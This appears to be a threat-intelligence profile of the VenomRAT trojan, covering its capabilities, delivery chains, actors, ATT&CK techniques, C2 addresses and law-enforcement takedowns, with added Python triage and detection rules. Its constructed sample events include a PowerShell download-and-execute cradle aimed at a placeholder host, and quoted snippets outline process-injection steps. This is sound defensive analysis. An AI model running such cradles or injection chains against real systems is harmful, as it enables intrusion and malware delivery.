VenomRAT
VenomRAT is a commodity Windows remote access trojan (RAT) used by multiple cybercriminal actors and identified in 2020. Several tracked sources describe it as based on or derived from Quasar RAT; other reporting and analysis place it in the AsyncRAT-derived ecosystem and note that it was likely inspired by DcRat. It is a .NET malware family observed in email- and web-delivered campaigns since at least 2022 in Proofpoint data.
High-confidence capabilities described across the tracked sources include information gathering, credential theft, exfiltration, lateral movement, follow-on payload delivery, keylogging, screen capture, hidden VNC (hVNC) functionality in the broader Venom suite, and remote control of infected systems. Some variants reportedly include ransomware functionality. Technical analysis also notes VenomRAT-related configuration and hunting artifacts: .conf files under AppData\Roaming with names such as DataLogs.conf and hvnc.conf, and a VenomRAT-specific encryption salt string, "VenomRATByVenom", in at least one analyzed sample. One analyzed sample carried metadata with InternalName/OriginalFilename "ClientAny.exe" and ProductVersion "6.0.5".
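An added triage helper (not code from this page, from Mallory, or from any vendor) that checks for the host artifacts just described: the reported .conf names under AppData\Roaming and the "VenomRATByVenom" salt string. The salt is searched as UTF-16LE as well as UTF-8 because .NET string literals are stored in the assembly's user-string heap as UTF-16LE; the file paths, file names and byte blobs below are constructed sample input.

```python
import ntpath
import re

# Artifact names and salt string as reported for analyzed VenomRAT samples.
SUSPICIOUS_CONF_NAMES = {"datalogs.conf", "hvnc.conf"}
SALT = "VenomRATByVenom"
# .NET string literals sit in the assembly's user-string heap as UTF-16LE,
# so search that encoding as well as plain UTF-8 (dumped configs, scripts).
SALT_PATTERNS = (("utf-8", SALT.encode("utf-8")),
                 ("utf-16le", SALT.encode("utf-16-le")))
APPDATA_ROAMING = re.compile(r"\\AppData\\Roaming\\", re.IGNORECASE)


def flag_conf_path(path: str) -> bool:
    """True when path is one of the reported .conf names under AppData\\Roaming."""
    name = ntpath.basename(path).lower()   # ntpath handles Windows paths anywhere
    return name in SUSPICIOUS_CONF_NAMES and bool(APPDATA_ROAMING.search(path))


def salt_encodings_found(data: bytes) -> list:
    """Return the encodings (utf-8, utf-16le) in which the salt appears in data."""
    return [label for label, pat in SALT_PATTERNS if pat in data]


def triage(paths, blobs):
    """paths: file paths; blobs: {name: bytes}. Returns (kind, detail) findings."""
    findings = []
    for p in paths:
        if flag_conf_path(p):
            findings.append(("conf-artifact", p))
    for name, data in blobs.items():
        encs = salt_encodings_found(data)
        if encs:
            findings.append(("salt-string", f"{name} ({','.join(encs)})"))
    return findings


# Constructed sample input (not real files or telemetry).
SAMPLE_PATHS = [
    r"C:\Users\alice\AppData\Roaming\DataLogs.conf",
    r"C:\Users\alice\AppData\Roaming\hvnc.conf",
    r"C:\Users\alice\Documents\notes.conf",
]
SAMPLE_BLOBS = {
    "ClientAny.exe": b"MZ\x90\x00" + SALT.encode("utf-16-le") + b"\x00\x00",
    "benign.dll": b"MZ\x90\x00nothing of interest",
}

if __name__ == "__main__":
    for kind, detail in triage(SAMPLE_PATHS, SAMPLE_BLOBS):
        print(kind, detail)
```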
Observed infection vectors in the content include phishing campaigns, malicious websites, tax-themed lures, JavaScript files that spawn PowerShell to download and execute the malware, WebDAV- and Cloudflare Tunnel-based delivery chains, Python-based loaders, and trojanized software installers including fake or pirated Internet Download Manager packages. VenomRAT has also been recovered as a payload in multi-stage loader chains using Donut shellcode and Early Bird APC injection into explorer.exe.
The malware is associated with several cybercrime operations and clusters. Proofpoint identifies TA558 as the most prominent distributor in its telemetry, with additional use by TA2541 and unattributed actors. VenomRAT also appeared in SERPENTINE#CLOUD campaigns alongside AsyncRAT, XWorm, DcRat, PureHVNC, Violet RAT, and PureCrypter, and in Kiss Loader activity. Infrastructure reporting links VenomRAT to multi-family C2 environments, including 178.22.24.175 in the Russian ASN AS209290 and other hosts such as 178.16.55.160, as well as DuckDNS-based C2s in later campaigns.
Law enforcement action under Operation Endgame targeted VenomRAT infrastructure in November 2025. Reporting states that authorities disrupted more than 1,000 servers tied to Rhadamanthys, VenomRAT, and Elysium; took down the VenomRAT-related domains remotesystem[.]in and venomlicense[.]com; and arrested the suspected creator in Greece. Separate reporting ties the broader Venom software suite to a developer later indicted in France; the suite was marketed as remote administration tooling but included VenomRAT, stealer functionality, hVNC capability, and password theft features targeting 22 software products.
Groups observed using it
3 distinct threat actors attributed by public researchers.
VenomRAT is a commodity remote access trojan (RAT) used by multiple cybercriminal threat actors. Around since 2020 but first observed in Proofpoint data in 2022... VenomRAT can be used for information gathering, exfiltration, lateral movement, and to download follow-on payloads. Some VenomRAT variants contain ransomware functionality.
The toolkit includes PureLogs, PureHVNC, and repackaged commodity RATs (AsyncRAT, VenomRAT, DcRat, XWorm).
Techniques & procedures
34 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 technique
Initial Access
4 techniques
"VenomRAT". This malicious program, identified in 2020, was mainly "distributed via phishing campaigns or malicious websites"
Proofpoint frequently observes VenomRAT in email campaign data... TA558 VenomRAT campaigns typically include 1,000 messages or less with lures in Portuguese, Spanish, and occasionally English.
Execution
8 techniques
The batch stagers are the initial execution layer. 29 .bat files recovered across six evidence directories deduplicate to 13 unique templates in four categories.
When executed, it establishes a connection to an external file share, typically via WebDAV, to download an LNK or VBS file.
When executed, the LNK/VBS executes a BAT or CMD file that downloads a Python installer package and a series of Python scripts leading to malware installation.
In recent campaigns, messages contained URLs leading to a JavaScript file. If executed, the file spawned PowerShell to download and run VenomRAT.
allocate RWX memory, write shellcode via WriteProcessMemory ... ctypes.windll.kernel32.VirtualProtect(... 0x40, # PAGE_EXECUTE_READWRITE ... )
Persistence
1 technique
Privilege Escalation
4 techniques
Injection technique: create a suspended notepad.exe , allocate RWX memory, write shellcode via WriteProcessMemory , queue an APC, resume the thread.
Injection technique: create a suspended notepad.exe , allocate RWX memory, write shellcode via WriteProcessMemory , queue an APC, resume the thread... Instead of notepad.exe, the loaders now create a suspended explorer.exe and use Early Bird APC injection
Process Injection (T1055.012): CreateProcessAsUserW → Create suspended target process; WriteProcessMemory → Write payload into target address space; SetThreadContext → Redirect execution to payload entry point; ResumeThread → Resume execution under target process identity
Stealth
13 techniques
Wave 4/5 introduces the deepest nesting observed in the campaign. The Nov19 Donut instances deliver native x64 PE wrappers instead of .NET assemblies directly... Layer 2: Kramer decode (hex -> unicode shift -> rotation -> RC4 -> base64)
Defense Evasion | Obfuscated Files: Encrypted Payload | T1027.013 | 1–6 | Multi-layer encryption (XOR, AES, Donut/Chaskey)
Defense Evasion | Masquerading: Double Extension | T1036.007 | 1–6 | .pdf.lnk, .pdf.wsh, .PDF.lnk
[Stage 3: Batch Downloader] - Deletes .bat files post-execution (anti-forensics)
Defense Evasion | System Binary Proxy Execution: Wscript | T1218.005 | 1–4, 6 | wscript.exe WSH/WSF execution
Checks for AvastUI.exe and AVGUI.exe via tasklist. If detected, downloads abb11.zip (OBKS-only, Avast-safe profile). If not, downloads quz11.zip
[Stage 3: Batch Downloader] - Hides payload directories with attrib +h
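Added detection logic (not from this page, from Mallory, or from any vendor rule set) covering two steps of the chain described above: the JavaScript/WSH stage spawning PowerShell to download the next stage, and the batch stage hiding its payload directory with attrib +h. The Sysmon-style JSON events, paths and URL are constructed sample input.

```python
import json

# Constructed Sysmon-style process-creation events (not real telemetry);
# only the fields the rules read are present. The URL is a placeholder.
EVENTS = [json.dumps(e) for e in (
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "powershell -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/p')\""},
    {"Image": r"C:\Windows\System32\attrib.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"attrib +h C:\Users\alice\AppData\Roaming\Python"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell Get-Process"},
)]

DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest",
                    "iwr ", "net.webclient", "start-bitstransfer")
STAGING_DIRS = ("\\appdata\\", "\\programdata\\", "\\public\\", "\\temp\\")

def base(path):
    return path.rsplit("\\", 1)[-1].lower()   # lower-cased file name of a Windows path

def rule_wsh_spawns_downloader(ev):
    """Script host (wscript/cscript) spawning PowerShell with a download cmdlet."""
    return (base(ev["ParentImage"]) in ("wscript.exe", "cscript.exe")
            and base(ev["Image"]) in ("powershell.exe", "pwsh.exe")
            and any(m in ev["CommandLine"].lower() for m in DOWNLOAD_MARKERS))

def rule_attrib_hides_staging_dir(ev):
    """attrib +h applied to a path under a user-writable staging directory."""
    cl = ev["CommandLine"].lower()
    return (base(ev["Image"]) == "attrib.exe" and "+h" in cl.split()
            and any(d in cl for d in STAGING_DIRS))

RULES = {"wsh_spawns_powershell_downloader": rule_wsh_spawns_downloader,
         "attrib_hides_staging_dir": rule_attrib_hides_staging_dir}

def evaluate(raw_events):
    """Run every rule over JSON event lines; return (rule, image) hits in order."""
    hits = []
    for line in raw_events:
        ev = json.loads(line)
        hits.extend((name, base(ev["Image"])) for name, rule in RULES.items() if rule(ev))
    return hits

if __name__ == "__main__":
    print(evaluate(EVENTS))
```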
Defense Impairment
1 technique
Discovery
2 techniques
Command and Control
6 techniques
C2 Tracker is a free-to-use, community-driven IOC feed that uses Shodan and Censys searches to collect IP addresses of known malware/botnet/C2 infrastructure.
C2 | Application Layer Protocol: Web Protocols | T1071.001 | 1–6 | WebDAV over HTTPS for staging
"We create remote administration tools and exploits out of passion for the field of penetration testing"
IOCs tracked for this family
33 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
Recent activity
55 sources tracked across advisories, community write-ups, and news.
A remote access tool whose infrastructure was shut down in a prior Operation Endgame action.
Named RAT/botnet malware operation targeted by Operation Endgame.
Malware suite marketed as remote administration and penetration-testing tools but described as clearly oriented toward cybercriminal use. It includes a RAT/trojan component, password-stealing capabilities targeting 22 applications, crypto-wallet theft functionality, and an hVNC module enabling covert use of infected machines.